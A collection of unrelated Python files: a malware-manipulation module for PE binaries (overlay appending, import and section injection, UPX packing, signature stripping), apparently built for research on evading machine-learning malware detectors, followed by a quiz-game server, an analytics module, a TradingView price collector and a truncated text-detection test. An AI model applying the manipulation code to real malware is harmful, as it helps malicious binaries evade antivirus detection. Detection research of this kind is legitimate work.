manipulate2.py | # TODO:
# * modify exports using lief
# * zero out rich header (if it exists) --> requires updating OptionalHeader's checksum ("Rich Header" only in Microsoft-produced executables)
# * tinker with resources: https://lief.quarkslab.com/doc/tutorials/07_pe_resource.html
import lief # pip install https://github.com/lief-project/LIEF/releases/download/0.7.0/linux_lief-0.7.0_py3.6.tar.gz
import json
import os
import sys
import array
import struct # byte manipulations
import random
import tempfile
import subprocess
import functools
import signal
import multiprocessing
import pickle
import pefile
import hashlib
module_path = os.path.split(os.path.abspath(sys.modules[__name__].__file__))[0]
COMMON_SECTION_NAMES = pickle.load(open(os.path.join(module_path, '../../../RL_Features/adversarial_sections_set.pk'), "rb"))
COMMON_IMPORTS = pickle.load(open(os.path.join(module_path, '../../../RL_Features/adversarial_imports_set.pk'), "rb"))
section_content = "manipulation_content/section-content.txt"
class MalwareManipulator(object):
def __init__(self, bytez):
self.bytez = bytez
self.min_append_log2 = 5
self.max_append_log2 = 8
def __random_length(self):
return 2**random.randint(self.min_append_log2, self.max_append_log2)
def __binary_to_bytez(self, binary, dos_stub=False, imports=False, overlay=False, relocations=False, resources=False, tls=False):
# write the file back as bytez
builder = lief.PE.Builder(binary)
builder.build_dos_stub(dos_stub) # rebuild DOS stub
builder.build_imports(imports) # rebuild IAT in another section
builder.patch_imports(imports) # patch original import table with trampolines to new import table
builder.build_overlay(overlay) # rebuild overlay
builder.build_relocations(relocations) # rebuild relocation table in another section
builder.build_resources(resources) # rebuild resources in another section
builder.build_tls(tls) # rebuilt TLS object in another section
builder.build() # perform the build process
# return bytestring
return array.array('B', builder.get_build()).tobytes()
def overlay_append(self, seed=None):
random.seed(seed)
L = self.__random_length()
# choose the upper bound for a uniform distribution in [0,upper]
upper = random.randrange(256)
# upper chooses the upper bound on uniform distribution:
# upper=0 would append with all 0s
# upper=126 would append with "printable ascii"
# upper=255 would append with any character
return self.bytez + bytes([random.randint(0, upper) for _ in range(L)])
def imports_append(self, seed=None):
importsFile = open("imports.txt" , 'w')
libname = random.choice(list(COMMON_IMPORTS))
while(len(list(COMMON_IMPORTS[libname])) < 20 ):
libname = random.choice(list(COMMON_IMPORTS))
importsFile.write(libname + '\n')
for fun in (list(COMMON_IMPORTS[libname])):
importsFile.write(fun + '\n')
importsFile.close()
with open("modified.exe", 'wb') as file1:
file1.write(self.bytez)
cmd = "portable-executable/project-add-imports/bin/Debug/project-append-import modified.exe imports.txt modified.exe"
os.system(cmd)
with open("modified.exe", "rb") as binfile:
self.bytez = binfile.read()
return self.bytez
def section_add(self, seed=None):
section = ""
while(len(section.strip()) < 1):
section = random.choice(COMMON_SECTION_NAMES)
with open("modified.exe", 'wb') as file1:
file1.write(self.bytez)
cmd = "portable-executable/project-add-sections/bin/Debug/project-append-section modified.exe " + section + " " + section_content + " modified.exe"
os.system(cmd)
with open("modified.exe", "rb") as binfile:
self.bytez = binfile.read()
return self.bytez
def section_append(self, seed=None):
# append to a section (changes size and entropy)
random.seed(seed)
binary1 = lief.parse(self.bytez, name="")
with open("modified.exe", 'wb') as file1:
file1.write(bytez)
binary = lief.PE.Binary("modified.exe", lief.PE.PE_TYPE.PE32)
if(len(binary1.sections) == 0):
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
if(len(binary.sections) == 0):
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
targeted_section = random.choice(binary.sections)
L = self.__random_length()
available_size = targeted_section.size - len(targeted_section.content)
if L > available_size:
L = available_size
upper = random.randrange(256)
targeted_section.content = targeted_section.content + [random.randint(0, upper) for _ in range(L)]
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
def section_rename(self, seed=None):
# rename a random section
#random.seed(seed)
binary = lief.parse(self.bytez, name="")
for i in range(0, 10):
targeted_section = random.choice(binary.sections)
targeted_section.name = random.choice(COMMON_SECTION_NAMES)[:7] # current version of lief not allowing 8 chars?
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
def upx_pack(self, seed=None):
# tested with UPX 3.91
random.seed(seed)
tmpfilename = os.path.join(
tempfile._get_default_tempdir(), next(tempfile._get_candidate_names()))
# dump bytez to a temporary file
with open(tmpfilename, 'wb') as outfile:
outfile.write(self.bytez)
options = ['--force', '--overlay=copy']
compression_level = random.randint(1, 9)
options += ['-{}'.format(compression_level)]
# --exact
# compression levels -1 to -9
# --overlay=copy [default]
# optional things:
# --compress-exports=0/1
# --compress-icons=0/1/2/3
# --compress-resources=0/1
# --strip-relocs=0/1
options += ['--compress-exports={}'.format(random.randint(0, 1))]
options += ['--compress-icons={}'.format(random.randint(0, 3))]
options += ['--compress-resources={}'.format(random.randint(0, 1))]
options += ['--strip-relocs={}'.format(random.randint(0, 1))]
with open(os.devnull, 'w') as DEVNULL:
retcode = subprocess.call(
['upx'] + options + [tmpfilename, '-o', tmpfilename + '_packed'], stdout=DEVNULL, stderr=DEVNULL)
os.unlink(tmpfilename)
if retcode == 0: # successfully packed
with open(tmpfilename + '_packed', 'rb') as infile:
self.bytez = infile.read()
os.unlink(tmpfilename + '_packed')
return self.bytez
def upx_unpack(self, seed=None):
# dump bytez to a temporary file
tmpfilename = os.path.join(
tempfile._get_default_tempdir(), next(tempfile._get_candidate_names()))
with open(tmpfilename, 'wb') as outfile:
outfile.write(self.bytez)
with open(os.devnull, 'w') as DEVNULL:
retcode = subprocess.call(
['upx', tmpfilename, '-d', '-o', tmpfilename + '_unpacked'], stdout=DEVNULL, stderr=DEVNULL)
os.unlink(tmpfilename)
if retcode == 0: # sucessfully unpacked
with open(tmpfilename + '_unpacked', 'rb') as result:
self.bytez = result.read()
os.unlink(tmpfilename + '_unpacked')
return self.bytez
def remove_signature(self, seed=None):
binary = lief.parse(self.bytez, name="")
if binary.has_signature:
for i, e in enumerate(binary.data_directories):
if e.type == lief.PE.DATA_DIRECTORY.CERTIFICATE_TABLE:
break
if e.type == lief.PE.DATA_DIRECTORY.CERTIFICATE_TABLE:
# remove signature from certificate table
e.rva = 0
e.size = 0
self.bytez = self.__binary_to_bytez(binary)
return self.bytez
# if no signature found, self.bytez is unmodified
return self.bytez
def add_signature(self, seed=None):
#http://manpages.ubuntu.com/manpages/bionic/man1/signcode.1.html
#sign the PE file using your certificate
return self.bytez
##############################
def identity(bytez, seed=None):
return bytez
######################
# explicitly list so that these may be used externally
ACTION_TABLE = {
# 'do_nothing': identity,
'overlay_append': 'overlay_append',
'section_rename' : 'section_rename',
'section_add' : 'section_add',
'imports_append' : 'imports_append'
}
# ACTION_TABLE = {
# # 'do_nothing': identity,
# 'overlay_append': 'overlay_append',
# 'section_rename' : 'section_rename',
# 'add_signature' : 'add_signature',
# 'section_add' : 'section_add',
# 'imports_append' : 'imports_append',
# 'remove_signature': 'remove_signature'
# }
def calculate_hash(bytez):
m = hashlib.sha256()
m.update( bytez )
#print("new hash: {}".format(m.hexdigest()))
def modify_without_breaking(bytez, actions=[], seed=None):
for action in actions:
_action = ACTION_TABLE[action]
# we run manipulation in a child process to shelter
# our malware model from rare parsing errors in LIEF that
# may segfault or timeout
def helper(_action,shared_list):
# TODO: LIEF is chatty. redirect stdout and stderr to /dev/null
# for this process, change segfault of the child process
# to a RuntimeEror
def sig_handler(signum, frame):
raise RuntimeError
signal.signal(signal.SIGSEGV, sig_handler)
bytez = array.array('B', shared_list[:]).tobytes()
# TODO: LIEF is chatty. redirect output to /dev/null
if type(_action) is str:
_action = MalwareManipulator(bytez).__getattribute__(_action)
else:
_action = functools.partial( _action, bytez )
# redirect standard out only in this queue
try:
shared_list[:] = _action(seed)
except (RuntimeError,UnicodeDecodeError,TypeError,lief.not_found) as e:
# some exceptions that have yet to be handled by public release of LIEF
print("==== exception in child process ===")
print(e)
# shared_bytez remains unchanged
# communicate with the subprocess through a shared list
# can't use multiprocessing.Array since the subprocess may need to
# change the size
manager = multiprocessing.Manager()
shared_list = manager.list()
shared_list[:] = bytez # copy bytez to shared array
# define process
p = multiprocessing.Process( target=helper, args=(_action,shared_list) )
p.start() # start the process
try:
p.join(5) # allow this to take up to 5 seconds...
except multiprocessing.TimeoutError: # ..then become petulant
print('==== timeouterror ')
p.terminate()
bytez = array.array('B', shared_list[:]).tobytes() # copy result from child process
import hashlib
m = hashlib.sha256()
m.update( bytez )
#print("new hash: {}".format(m.hexdigest()))
return bytez |
server.py | #!/usr/bin/env python3
"""Game server"""
from socket import AF_INET, socket, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR
from threading import Thread
from game import get_question, get_random_mapping
from ui import get_messages
import time
import signal
import sys
USAGE = """
While waiting for a game to start, you can type 'ready' to ready up.
When more than half of the connected players is ready, the game starts.
To answer to the questions type either '0', '1' or '2'.
To change username, type 'setname <new_username>' note that no spaces are allowed in usernames.
To quit the game, type 'quit'.
The game will last for 300s, during which you should try to answer to as many questions correctly.
Before every question you will be asked to pick a number between 0 and 2,
if you pick the wrong one, the game will end for you.
Every question has 3 possible answers,
if you pick the correct one you will be awarded +1 points,
if you pick the wrong one you will be awarded -1 points,
note that your score can become negative.
"""
HOST = '0.0.0.0'
PORT = 53000
BUFSIZ = 1024
ADDR = (HOST, PORT)
SERVER = socket(AF_INET, SOCK_STREAM)
SERVER.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
SERVER.bind(ADDR)
GAME_DURATION = 300
WAITING = 0
IN_GAME = 1
OVER = 2
state = WAITING
players = []
num_connected_clients = 0
num_ready_clients = 0
all_threads = []
class Player:
def __init__(self, client, address, player_id, name, is_api):
self.client = client
self.address = address
self.player_id = player_id
self.name = name
self.score = 0
self.is_api = is_api
self.to_close = False
self.is_ready = False
def msg(self, msg):
try:
self.client.send(bytes(msg, "utf8"))
except:
self.close("Some communication error occurred")
def close(self, msg):
global num_connected_clients
try:
if not self.to_close:
self.to_close = True
msgs = get_messages(self.is_api)
self.msg(msgs["scoreboard"]((players, self)))
self.msg(msgs["quit"](msg))
num_connected_clients -= 1
self.client.close()
except:
return
def accept_loop():
global state
global num_connected_clients
global num_ready_clients
global all_threads
# handle incoming connections
while state == WAITING:
try:
client, client_address = SERVER.accept()
except ConnectionAbortedError:
break
print("[_] New client (%s:%s)" % client_address)
client_id = num_connected_clients
name = "Player" + str(client_id)
bad_name = True
while bad_name:
name = name+"_"
bad_name = False
for i in players:
if i.name == name:
bad_name = True
break
# check if API
api = False
try:
client.settimeout(0.5)
msg = client.recv(BUFSIZ).decode("utf-8")
if msg.strip() == "api":
api = True
except:
pass
try:
client.settimeout(GAME_DURATION)
except:
pass
player = Player(client, client_address, client_id, name, api)
players.append(player)
# diamo inizio all'attività del Thread - uno per ciascun client
t = Thread(target=handle_client, args=(player,))
t.daemon = True
all_threads.append(t)
t.start()
num_connected_clients += 1
def main_loop():
global state
global num_connected_clients
global num_ready_clients
while state == WAITING:
time.sleep(1)
if num_ready_clients*2 > num_connected_clients:
state = IN_GAME
# Game loop
print("Entering game")
time.sleep(GAME_DURATION)
state = OVER
print(players)
def get_response(player):
global num_ready_clients
msgs = get_messages(player.is_api)
while True:
try:
ans = player.client.recv(BUFSIZ).decode("utf8").strip().split()
except:
player.close("Some communication error occurred")
break
if len(ans) == 0:
continue
elif len(ans) == 2 and ans[0] == "setname":
name = ans[1]
bad_name = False
for i in players:
if i.name == name:
bad_name = True
player.msg(msgs["message"]("This name is already in use, please select another name"))
break
if not bad_name:
player.name = name
player.msg(msgs["message"]("You changed name to %s" % name))
elif len(ans) == 1 and ans[0] == "quit":
player.close("You quit the game")
break
elif len(ans) == 1 and ans[0].isdigit():
res = int(ans[0])
if res == 0 or res == 1 or res == 2:
return res
else:
player.msg(msgs["message"]("Unknown command"))
"""Handle a single client connection."""
# prende il socket del client come argomento della funzione.
def handle_client(player):
global state
global num_ready_clients
# send usage guide
player.msg(USAGE)
# send welcome message
player.msg("You joined the game with name %s\n" % player.name)
msgs = get_messages(player.is_api)
while state == WAITING and not player.to_close:
if player.is_ready:
player.msg(msgs["message"]("Waiting for game to start ({}/{} players ready)".format(num_ready_clients, num_connected_clients)))
time.sleep(2)
else:
try:
player.client.settimeout(4)
player.msg(msgs["message"]("type 'ready' to ready up! ({}/{} players ready)".format(num_ready_clients, num_connected_clients)))
msg = player.client.recv(BUFSIZ).decode("utf-8")
if msg.strip() == "ready":
player.is_ready = True
num_ready_clients += 1
player.msg(msgs["message"]("Readyd up"))
except:
pass
try:
player.client.settimeout(GAME_DURATION)
except:
pass
player.msg(msgs["message"]("Game started!"))
turn = 0
while state == IN_GAME:
player.msg(msgs["choose"](("Choose a question:", [(str(i), "Question " + chr(ord('A') + i)) for i in range(3)])))
ans = get_response(player)
if player.to_close:
break
is_bad, question = get_question(turn, ans)
if is_bad:
player.close("Your choice was the trap, you lost!")
break
player.msg(msgs["choose"]((question[0], [(str(i[0]), i[1]) for i in enumerate(question[1])])))
ans = get_response(player)
if player.to_close:
break
if ans == question[2]:
player.msg(msgs["message"]("Your answer was correct! You get a point"))
player.score += 1
else:
player.msg(msgs["message"]("Your answer was wrong! You lose a point"))
player.score -= 1
turn += 1
player.close("The game is over")
""" Send a broadcast message."""
# il prefisso è usato per l'identificazione del nome.
def broadcast(msg):
global players
for utente in players:
utente.msg(msg)
def signal_handler(signal, frame):
try:
print("exiting")
state = OVER
for i in players:
i.close("The session was terminated by the server")
SERVER.close()
except:
print("something went wrong on exiting")
pass
finally:
sys.exit(0)
if __name__ == "__main__":
signal.signal(signal.SIGINT, signal_handler)
SERVER.listen(5)
print("In attesa di connessioni...")
ACCEPT_THREAD = Thread(target=accept_loop)
MAIN_THREAD = Thread(target=main_loop)
ACCEPT_THREAD.daemon = True
MAIN_THREAD.daemon = True
all_threads.append(ACCEPT_THREAD)
all_threads.append(MAIN_THREAD)
ACCEPT_THREAD.start()
MAIN_THREAD.start()
for t in all_threads:
t.join()
state = OVER
for i in players:
i.close("The game is over")
SERVER.close()
|
analytics.py | import logging
import os
import io
import requests
import calendar
import threading
from datetime import datetime
from mixpanel import Mixpanel, MixpanelException
from copy import deepcopy
from operator import itemgetter
from uuid import uuid4
from .misc import get_app_version, parse_config, convert_string_to_hash
from .io import get_config_dir
logger = logging.getLogger(__name__)
mp = Mixpanel('269cd4e25e97cc15bdca5b401e429892')
class Analytics(object):
def __init__(self, label_config_line, collect_analytics=True, project_name='', context=None):
self._label_config_line = label_config_line
self._collect_analytics = collect_analytics
self._project_name = convert_string_to_hash(project_name)
self._version = get_app_version()
self._user_id = self._get_user_id()
self._label_types = self._get_label_types()
self._context = context or {}
def _get_user_id(self):
user_id_file = os.path.join(get_config_dir(), 'user_id')
if not os.path.exists(user_id_file):
user_id = str(uuid4())
with io.open(user_id_file, mode='w') as fout:
fout.write(user_id)
if self._collect_analytics:
try:
mp.people_set(user_id, {
'$name': user_id,
'app': 'label-studio',
'version': self._version
})
except MixpanelException as exc:
logger.error('Can\'t send user profile analytics. Reason: ' + str(exc), exc_info=True)
logger.debug('Your user ID ' + str(user_id) + ' is saved to ' + str(user_id_file))
else:
with io.open(user_id_file) as f:
user_id = f.read()
logger.debug('Your user ID ' + str(user_id) + ' is loaded from ' + str(user_id_file))
return user_id
def _get_label_types(self):
info = parse_config(self._label_config_line)
label_types = []
for tag_info in info.values():
output_type = tag_info['type']
input_types = list(map(itemgetter('type'), tag_info['inputs']))
label_types.append({
output_type: {
'input_types': input_types,
'num_labels': len(tag_info['labels'])
}
})
return label_types
def _get_timestamp_now(self):
return calendar.timegm(datetime.now().timetuple())
def update_info(self, label_config_line, collect_analytics=True, project_name='', context=None):
if label_config_line != self._label_config_line:
self._label_types = self._get_label_types()
self._collect_analytics = collect_analytics
self._context = context or {}
self._project_name = convert_string_to_hash(project_name)
def send(self, event_name, **kwargs):
# self.send_job(event_name, **kwargs)
thread = threading.Thread(target=self.send_job, args=(event_name,), kwargs=kwargs)
thread.start()
def send_job(self, event_name, **kwargs):
if not self._collect_analytics:
return
data = deepcopy(kwargs)
data.update(self._context)
data['version'] = self._version
data['label_types'] = self._label_types
data['project'] = self._project_name
event_name = 'LS:' + str(event_name)
try:
mp.track(self._user_id, event_name, data)
except MixpanelException as exc:
logger.debug('Can\'t track ' + str(event_name) + ' . Reason: ' + str(exc), exc_info=True)
json_data = data
json_data['event'] = event_name
json_data['server_id'] = self._user_id
json_data['server_time'] = self._get_timestamp_now()
try:
url = 'https://analytics.labelstud.io/prod'
logger.debug('Sending to {url}:\n{data}'.format(url=url, data=json_data))
requests.post(url=url, json=json_data)
except requests.RequestException as exc:
logger.debug('Analytics error: {exc}'.format(exc=str(exc)))
|
intraday.py | """
IntradayPriceManager connects to TradingView and stores indicators and price series in an
in memory dictionary self._alerts. These indicators are then published to slack periodically.
"""
import datetime
import json
import pandas as pd
import random
import re
import string
import time
import threading
import websocket
from utilfns.slack import send_alert
class IntradayPriceManager():
def __init__(self, debug=False):
self._alerts = {
"indicators": {},
"price": {}
} # In-memory dict of alerts to be sent out to slack
self._debug = debug
self._histbars = 300
self._indicators = []
self._slackchannel = "C01UACFTMTK" # TODO: Shift to config
self._slackfreq = 300 # Every 5 mins
self._state = {}
self._syms = [
"BINANCE:UNIUSD", "BINANCE:ETHUSD", "BINANCE:DOTUSD", "SGX:ES3",
"SGX:CLR"
]
self._t = None
self._timeframe = 240 # Default to 4 hours chart
self._ws_url = "wss://data.tradingview.com/socket.io/websocket"
def get(self, type: str, **kwargs):
"""
Type is either quote (live) or chart (historical + live)
Support kwargs:
syms: list of symbols, e.g. [BINANCE:ETHUSD]
indicators: list of indicators, e.g. [rsi]
timeframe: int of minutes of chart time frame, e.g. 240 -> 4 hours chart
histbars: int of number of historical data points, e.g. 300
"""
websocket.enableTrace(True)
ws = websocket.WebSocketApp(
self._ws_url,
on_open=lambda ws: self.on_open(ws, type, **kwargs),
on_close=self.on_close,
on_message=lambda ws, message: self.on_message(ws, message),
on_error=self.on_error)
ws.run_forever()
def send_slack(self):
"""
Periodic slack alerts - Indicators
"""
while True:
indicators = self._alerts.get("indicators")
if indicators:
res = pd.DataFrame(indicators).transpose().reset_index()
res.rename(columns={"index": "sym"}, inplace=True)
send_alert(self._slackchannel, [("Indicators", res)])
time.sleep(self._slackfreq)
def on_message(self, ws, message):
pattern = re.compile(r'~m~\d+~m~~h~\d+$')
if pattern.match(message):
ws.send(message)
else:
msg_body = re.compile(r'~m~\d+~m~')
messages = msg_body.split(message)
for msg in messages:
if msg:
parsed_msg = json.loads(msg)
params = parsed_msg.get("p")
if parsed_msg.get("m") == "timescale_update":
# timescale_update -> initial historical data
# TODO: handling of these data for plotting on UI
continue
if parsed_msg.get("m") == "du":
# du -> data update
sym = self._state.get(params[0]).get("sym")
now = datetime.datetime.now().strftime(
'%Y-%m-%d %H:%M:%S')
for k, v in params[1].items():
if v.get("st"):
# study
indicator = k.split("_")[0]
vals = v.get("st")[0].get("v")
val = vals[1]
val_dict = {"dtime": now, indicator: val}
# print({sym: val_dict})
if not self._alerts["indicators"].get(sym):
self._alerts["indicators"][sym] = {}
self._alerts["indicators"][sym][
indicator] = val
elif v.get("s"):
# series
vals = v.get("s")[0].get("v")
val_dict = dict(
zip([
"dtime", "open", "high", "low", "last",
"vol"
], vals))
val_dict["dtime"] = now
# print({sym: val_dict})
if not self._alerts["price"].get(sym):
self._alerts["price"][sym] = {}
self._alerts["price"][sym]["last"] = val_dict[
"last"]
@staticmethod
def on_error(ws, error):
print(error)
@staticmethod
def on_close(ws):
print("### closed ###")
def on_open(self, ws, type: str, **kwargs):
def run(*args, **kwargs):
# ~m~52~m~{"m":"quote_create_session","p":["qs_3bDnffZvz5ur"]}
# ~m~395~m~{"m":"quote_set_fields","p":["qs_3bDnffZvz5ur","ch","chp","lp"]}
# ~m~89~m~{"m":"quote_add_symbols","p":["qs_3bDnffZvz5ur","SP:SPX",{"flags":["force_permission"]}]}
# ~m~315~m~{"m":"quote_fast_symbols","p":["qs_3bDnffZvz5ur","SP:SPX","TVC:NDX","CBOE:VIX","TVC:DXY","SGX:ES3","NASDAQ:AAPL","NASDAQ:MSFT","NASDAQ:TSLA","TVC:USOIL","TVC:GOLD","TVC:SILVER","FX:AUDUSD","FX:EURUSD","FX:GBPUSD","FX:USDJPY","BITSTAMP:BTCUSD","BITSTAMP:ETHUSD","COINBASE:UNIUSD","BINANCE:DOGEUSD","BINANCE:DOTUSD"]}
syms = kwargs.get("syms") or self._syms
timeframe = f'{kwargs.get("timeframe") or self._timeframe}'
indicators = kwargs.get("indicators") or self._indicators
histbars = kwargs.get("histbars") or self._histbars
send = self._send
send(ws, "set_auth_token", ["unauthorized_user_token"])
# Quote session
if not args or (args and args[0] == "quote"):
session = self._gen_session() # Quote session ID
send(ws, "quote_create_session", [session])
send(ws, "quote_set_fields", [session, "lp", "volume"])
[ws.send(self._add_symbol(session, s)) for s in syms]
send(ws, "quote_fast_symbols", [session, *syms])
send(ws, "quote_hibernate_all", [session])
# Chart session - Prefer to use this over quote sessions since it has a historical series
else:
for i, sym in enumerate(syms):
# Each ticker warrants a separate chart session ID
c_session = self._gen_session(type="chart")
self._state[c_session] = {
"sym": sym,
"indicators": [],
"series": [],
"timeframe": timeframe
}
# Users are allowed to select specific tickers
send(ws, "chart_create_session", [c_session, ""])
send(ws, "switch_timezone", [c_session, "Asia/Singapore"])
send(ws, "resolve_symbol", [
c_session, f"symbol_{i}",
self._add_chart_symbol(sym)
])
# s (in resp) -> series
self._state[c_session].get("series").append(f"s_{i}")
send(ws, "create_series", [
c_session, f"s_{i}", f"s_{i}", f"symbol_{i}",
timeframe, histbars
])
for indicator in indicators:
# Users are allowed to select specific indicators
# st (in resp) -> study
self._state[c_session].get("indicators").append(
f"{indicator}_{i}")
send(ws, "create_study", [
c_session, f"{indicator}_{i}", f"{indicator}_{i}",
f"s_{i}", "Script@tv-scripting-101!",
self._indicator_mapper(indicator)
])
self._t = threading.Thread(target=run, args=(type, ), kwargs=kwargs)
self._t.setDaemon(True)
self._t.start()
def _send(self, ws, func, params):
""" Client sends msg to websockets server """
ws.send(self._create_msg(func, params))
def _indicator_mapper(self, indicator: str) -> dict:
""" Indicator params that are accepted by the tv server """
return {
"rsi": {
"text":
"1f0fkZ72S0de2geyaUhXXw==_xwY73vljRXeew69Rl27RumLDs6aJ9NLsTYN9Xrht254BTb8uSOgccpLDt/cdRWopwJPNZx40m19yEFwJFswkSi62X4guNJYpXe4A6S9iq2n+OXM6mqWeWzDbjTl0lYmEf1ujbg7i3FvUdV/zCSrqd+iwnvvZSV+O2acpfNLpUlDdB6PZX4Y9y8tlQLWA2PiF8CVJng7DF1LPeecWC4fv+lNg+s5OXU46AjIhc+TFu8DOwiuKjNh7wWz6EZ7gpQS3",
"pineId": "STD;RSI",
"pineVersion": "12.0",
"in_2": {
"v": "",
"f": True,
"t": "resolution"
},
"in_0": {
"v": 14,
"f": True,
"t": "integer"
},
"in_1": {
"v": "close",
"f": True,
"t": "source"
}
}
}.get(indicator.lower())
def _create_msg(self, func, params):
""" _create_msg("set_auth_token", "unauthorized_user_token") """
msg = self._prepend_header(json.dumps({"m": func, "p": params}))
if self._debug:
print("DEBUG:", msg)
return msg
def _gen_session(self, type="chart"):
# ~m~52~m~{"m":"quote_create_session","p":["qs_3bDnffZvz5ur"]}
session = ""
if type == "quote":
session = "qs_"
elif type == "chart":
session = "cs_"
else:
raise Exception("Invalid session type")
return session + "".join(random.choices(string.ascii_letters, k=12))
def _add_symbol(self, quote_session: str, sym: str):
""" Quote symbol: _add_symbol("3bDnffZvz5ur", "BINANCE:UNIUSD") """
return self._create_msg("quote_add_symbols", [quote_session, sym])
def _add_chart_symbol(self, sym: str):
""" Chart symbol - Only required for the first symbol """
return "=" + json.dumps({"symbol": sym})
def _prepend_header(self, msg):
return f'~m~{len(msg)}~m~{msg}'
if __name__ == "__main__":
ipm = IntradayPriceManager()
alerting_thread = threading.Thread(target=ipm.send_slack)
alerting_thread.start()
ipm.get(type="chart",
syms=[
"BINANCE:BTCUSD", "BINANCE:ETHUSD", "BINANCE:DOTUSD",
"BINANCE:UNIUSD", "BINANCE:SOLUSD"
],
indicators=["rsi"],
timeframe=240,
histbars=300)
|
test_icdar2015_dcl_ms.py | # -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import sys
import tensorflow as tf
import cv2
import numpy as np
import math
from tqdm import tqdm
import argparse
from multiprocessing import Queue, Process
sys.path.append("../")
from libs.networks import build_whole_network_dcl
from help_utils import tools
from libs.label_name_dict.label_dict import *
from libs.box_utils import draw_box_in_img
from libs.box_utils.coordinate_convert import forward_convert, backward_convert
from libs.box_utils import nms_rotate
from libs.box_utils.rotate_polygon_nms import rotate_gpu_nms
def worker(gpu_id, images, det_net, result_queue):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
# 1. preprocess img
img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. not BGR
img_batch = tf.cast(img_plac, tf.float32)
if cfgs.NET_NAME in ['resnet152_v1d', 'resnet101_v1d', 'resnet50_v1d']:
img_batch = (img_batch / 255 - tf.constant(cfgs.PIXEL_MEAN_)) / tf.constant(cfgs.PIXEL_STD)
else:
img_batch = img_batch - tf.constant(cfgs.PIXEL_MEAN)
img_batch = tf.expand_dims(img_batch, axis=0)
detection_scores, detection_category, detection_boxes_angle = det_net.build_whole_detection_network(
input_img_batch=img_batch,
gtboxes_batch_h=None,
gtboxes_batch_r=None,
gt_encode_label=None,
gpu_id=0)
init_op = tf.group(
tf.global_variables_initializer(),
tf.local_variables_initializer()
)
restorer, restore_ckpt = det_net.get_restorer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(init_op)
if not restorer is None:
restorer.restore(sess, restore_ckpt)
print('restore model %d ...' % gpu_id)
for a_img in images:
raw_img = cv2.imread(a_img)
raw_h, raw_w = raw_img.shape[0], raw_img.shape[1]
det_boxes_r_all, det_scores_r_all, det_category_r_all = [], [], []
img_short_side_len_list = cfgs.IMG_SHORT_SIDE_LEN if isinstance(cfgs.IMG_SHORT_SIDE_LEN, list) else [
cfgs.IMG_SHORT_SIDE_LEN]
img_short_side_len_list = [img_short_side_len_list[0]] if not args.multi_scale else img_short_side_len_list
for short_size in img_short_side_len_list:
max_len = cfgs.IMG_MAX_LENGTH
if raw_h < raw_w:
new_h, new_w = short_size, min(int(short_size * float(raw_w) / raw_h), max_len)
else:
new_h, new_w = min(int(short_size * float(raw_h) / raw_w), max_len), short_size
img_resize = cv2.resize(raw_img, (new_w, new_h))
resized_img, detected_boxes, detected_scores, detected_categories = \
sess.run(
[img_batch, detection_boxes_angle, detection_scores, detection_category],
feed_dict={img_plac: img_resize[:, :, ::-1]}
)
detected_indices = detected_scores >= cfgs.VIS_SCORE
detected_scores = detected_scores[detected_indices]
detected_boxes = detected_boxes[detected_indices]
detected_categories = detected_categories[detected_indices]
if detected_boxes.shape[0] == 0:
continue
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
detected_boxes = forward_convert(detected_boxes, False)
detected_boxes[:, 0::2] *= (raw_w / resized_w)
detected_boxes[:, 1::2] *= (raw_h / resized_h)
# detected_boxes = backward_convert(detected_boxes, False)
det_boxes_r_all.extend(detected_boxes)
det_scores_r_all.extend(detected_scores)
det_category_r_all.extend(detected_categories)
det_boxes_r_all = np.array(det_boxes_r_all)
det_scores_r_all = np.array(det_scores_r_all)
det_category_r_all = np.array(det_category_r_all)
box_res_rotate_ = []
label_res_rotate_ = []
score_res_rotate_ = []
if det_scores_r_all.shape[0] != 0:
for sub_class in range(1, cfgs.CLASS_NUM + 1):
index = np.where(det_category_r_all == sub_class)[0]
if len(index) == 0:
continue
tmp_boxes_r = det_boxes_r_all[index]
tmp_label_r = det_category_r_all[index]
tmp_score_r = det_scores_r_all[index]
tmp_boxes_r_ = backward_convert(tmp_boxes_r, False)
try:
inx = nms_rotate.nms_rotate_cpu(boxes=np.array(tmp_boxes_r_),
scores=np.array(tmp_score_r),
iou_threshold=cfgs.NMS_IOU_THRESHOLD,
max_output_size=5000)
except:
tmp_boxes_r_ = np.array(tmp_boxes_r_)
tmp = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
tmp[:, 0:-1] = tmp_boxes_r_
tmp[:, -1] = np.array(tmp_score_r)
# Note: the IoU of two same rectangles is 0, which is calculated by rotate_gpu_nms
jitter = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
jitter[:, 0] += np.random.rand(tmp_boxes_r_.shape[0], ) / 1000
inx = rotate_gpu_nms(np.array(tmp, np.float32) + np.array(jitter, np.float32),
float(cfgs.NMS_IOU_THRESHOLD), 0)
box_res_rotate_.extend(np.array(tmp_boxes_r)[inx])
score_res_rotate_.extend(np.array(tmp_score_r)[inx])
label_res_rotate_.extend(np.array(tmp_label_r)[inx])
box_res_rotate_ = np.array(box_res_rotate_)
score_res_rotate_ = np.array(score_res_rotate_)
label_res_rotate_ = np.array(label_res_rotate_)
result_dict = {'scales': [1, 1], 'boxes': box_res_rotate_,
'scores': score_res_rotate_, 'labels': label_res_rotate_,
'image_id': a_img}
result_queue.put_nowait(result_dict)
def test_icdar2015(det_net, real_test_img_list, gpu_ids, show_box, txt_name):
save_path = os.path.join('./test_icdar2015', cfgs.VERSION)
tools.mkdir(save_path)
nr_records = len(real_test_img_list)
pbar = tqdm(total=nr_records)
gpu_num = len(gpu_ids.strip().split(','))
nr_image = math.ceil(nr_records / gpu_num)
result_queue = Queue(500)
procs = []
for i, gpu_id in enumerate(gpu_ids.strip().split(',')):
start = i * nr_image
end = min(start + nr_image, nr_records)
split_records = real_test_img_list[start:end]
proc = Process(target=worker, args=(int(gpu_id), split_records, det_net, result_queue))
print('process:%d, start:%d, end:%d' % (i, start, end))
proc.start()
